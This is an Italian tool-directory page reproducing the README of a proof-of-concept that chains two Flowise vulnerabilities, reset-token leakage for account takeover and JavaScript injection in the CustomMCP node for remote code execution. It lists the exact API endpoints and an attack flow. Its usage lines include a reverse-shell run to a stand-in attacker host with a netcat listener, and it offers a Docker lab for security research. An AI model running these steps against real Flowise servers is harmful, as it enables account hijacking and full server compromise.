Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Flowise-CVE-2025-58434-Chain-59528 — FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, che dimostra ATO non autenticato tramite fuga del token di reset, seguito da RCE autenticato. Include un ambiente di laboratorio Docker riproducibile. | Kitploit
Strumenti/GitHubGitHub/0xdaeras/flowise-cve-2025-58434-chain-59528
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e FormazioneLab e Pratica
GitHub0xdaeras/flowise-cve-2025-58434-chain-59528

Flowise-CVE-2025-58434-Chain-59528

FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, che dimostra ATO non autenticato tramite fuga del token di reset, seguito da RCE autenticato. Include un ambiente di laboratorio Docker riproducibile.

Vedi Repository
164 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Catena CVE di FlowiseAI - ATO (CVE-2025-58434) e RCE (CVE-2025-59528)

CVE-2025-58434 CVSS-1 CVE-2025-59528 CVSS-2 Python License

⚠️ Solo per scopi educativi e ricerca di sicurezza autorizzata. Eseguire questo strumento su sistemi di cui non si è proprietari o senza permesso scritto è illegale.


Indice dei contenuti

Questo repository contiene un proof-of-concept in Python per concatenare due vulnerabilità di Flowise:

  • CVE-2025-58434 — Acquisizione dell'account tramite esposizione del token di reset della password.
  • CVE-2025-59528 — Esecuzione di codice remoto tramite valutazione non sicura di JavaScript nel nodo CustomMCP.

Flowise è una piattaforma drag-and-drop per creare applicazioni LLM e flussi di lavoro di agenti AI. CVE-2025-59528 interessa Flowise 3.0.5 ed è stata corretta nella versione 3.0.6. Il problema deriva dalla gestione non sicura di mcpServerConfig all'interno del nodo CustomMCP. CVE-2025-58434 è relativa all'esposizione del token di reset della password ed è stata anch'essa risolta in Flowise 3.0.6.

Lo strumento supporta:

  • Controllo delle vulnerabilità
  • Flusso di acquisizione account
  • Login e recupero cookie
  • RCE autenticato
  • Modalità catena completa: ATO → login → RCE

Dettagli delle vulnerabilità

CVE-2025-58434 — Acquisizione dell'account

  • CVE ID: CVE-2025-58434
  • Punteggio CVSS v3.1: 9.8 (Critico)
  • Tipo di vulnerabilità: Acquisizione dell'account / Bypass dell'autenticazione
  • Prodotto interessato: Flowise
  • Versione testata interessata: Flowise 3.0.5
  • Versione corretta: Flowise 3.0.6
  • Autenticazione richiesta: No
  • Impatto: Divulgazione del token di reset della password, acquisizione dell'account

Il flusso vulnerabile di reset della password espone dati sensibili dell'utente, inclusi i token temporanei di reset della password, nella risposta API. Un attaccante che conosce un indirizzo email valido può richiedere un reset della password, recuperare il token temporaneo dalla risposta e utilizzarlo per impostare una nuova password per l'account.

Il comportamento vulnerabile interessa le distribuzioni cloud di Flowise e quelle self-hosted/locali che espongono la stessa superficie API. La mitigazione consiste nel non restituire mai token di reset della password o dati sensibili di reset dell'account direttamente nelle risposte API.

CVE-2025-59528 — Esecuzione di codice remoto

  • CVE ID: CVE-2025-59528
  • Punteggio CVSS v3.1: 10.0 (Critico)
  • Tipo di vulnerabilità: Iniezione di codice JavaScript / Esecuzione di codice remoto
  • Prodotto interessato: Flowise
  • Versione testata interessata: Flowise 3.0.5
  • Versione corretta: Flowise 3.0.6
  • Autenticazione richiesta: Sì
  • Impatto: Esecuzione arbitraria di JavaScript nel runtime Node.js, RCE sul server che ospita Flowise

La vulnerabilità esiste nel nodo CustomMCP di Flowise. Il parametro mcpServerConfig viene analizzato come parte del processo di configurazione del server MCP e viene valutato come codice JavaScript senza alcuna validazione di sicurezza. Ciò consente a un attaccante autenticato di iniettare codice JavaScript arbitrario, che viene eseguito nell'ambiente Node.js del server Flowise. Nella funzione convertToValidJSONString, l'input dell'utente viene passato al costruttore Function, che valuta l'input come codice JavaScript con tutti i privilegi di Node.js, consentendo l'accesso a moduli come child_process per eseguire comandi di sistema.

L'endpoint vulnerabile utilizzato da questo PoC è:

POST /api/v1/node-load-method/customMCP

con payload js nel campo mcpServerConfig del corpo JSON, ad esempio:

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "..."
  }
}

Il codice vulnerabile si trova nel file CustomMCP.ts ed è referenziato nell'Avviso del Manutentore Github per la CVE.


Flusso dell'attacco

Attacker                                   Flowise
   │                                          │
   │  [CVE-2025-58434]                       │
   │  POST /api/v1/account/forgot-password   │
   │  { email }                              │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  user object + tempToken                 │
   │                                          │
   │  POST /api/v1/account/reset-password     │
   │  { email, tempToken, newPassword }       │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  password changed                        │
   │                                          │
   │  POST /api/v1/auth/login                 │
   │  { email, newPassword }                  │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  token / refreshToken / connect.sid      │
   │                                          │
   │  [CVE-2025-59528]                       │
   │  POST /api/v1/node-load-method/customMCP │
   │  mcpServerConfig=<crafted config>        │
   │─────────────────────────────────────────►│
   │                              JS evaluated in Node.js
   │                              command executed
   │◄─────────────────────────────────────────│
   │  command output or payload fired         │
   │                                          │
   ✓  Acquisizione account + RCE autenticato

Struttura del repository:

Repository Structure
CVE-2025-58434-CVE-2025-59528/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
└── logs/

Installazione

Strumento

git clone https://github.com/0xDaeras/CVE-2025-58434-CVE-2025-59528-POC.git
cd CVE-2025-58434-CVE-2025-59528-POC
pip install -r requirements.txt

Laboratorio Docker

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env  # Configure environment variables
docker-compose up -d

Utilizzo

Comportamento predefinito

Senza argomenti, lo strumento esegue l'intera catena di attacco, verificando la vulnerabilità del target, eseguendo l'acquisizione dell'account per l'email fornita, effettuando il login per recuperare i cookie e quindi sfruttando la vulnerabilità RCE con un payload di reverse shell. Eseguire un listener dedicato (es. nc -lvnp 9889) prima di eseguire lo strumento in modalità catena completa.

python3 exploit.py --target http://localhost:3000 --email [email protected] --lhost attacker.local --lport 9889

Schermata di aiuto

python3 exploit.py -h

Modalità

check-mode (modalità di controllo)

Esegue un controllo della versione per determinare se il target è vulnerabile a CVE-2025-58434 e CVE-2025-59528. Invia una richiesta all'API del target e analizza la risposta per identificare la versione di Flowise e lo stato della vulnerabilità.

python3 exploit.py --target http://localhost:3000 check

ato-mode (modalità ATO)

Esegue il processo di acquisizione dell'account per CVE-2025-58434. Invia una richiesta di reset della password per l'email specificata, recupera il token temporaneo dalla risposta e utilizza quel token per impostare una nuova password (predefinita: "Password123!") per l'account.

python3 exploit.py --target http://localhost:3000 --email [email protected] ato-mode
Scarica lo strumento